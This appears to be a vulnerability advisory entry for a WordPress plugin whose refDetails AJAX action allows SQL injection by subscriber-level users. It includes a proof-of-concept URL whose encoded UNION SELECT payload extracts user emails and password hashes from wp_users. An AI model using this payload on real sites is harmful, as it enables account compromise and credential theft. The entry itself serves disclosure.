The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks
https://example.com/wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22%27%20union%20select%201,1,user_email,user_pass%20from%20wp_users%20--%20g%22%7D
Krzysztof Zając
Krzysztof Zając
Yes
2021-11-22 (about 1 years ago)
2021-11-22 (about 1 years ago)
2022-04-11 (about 9 months ago)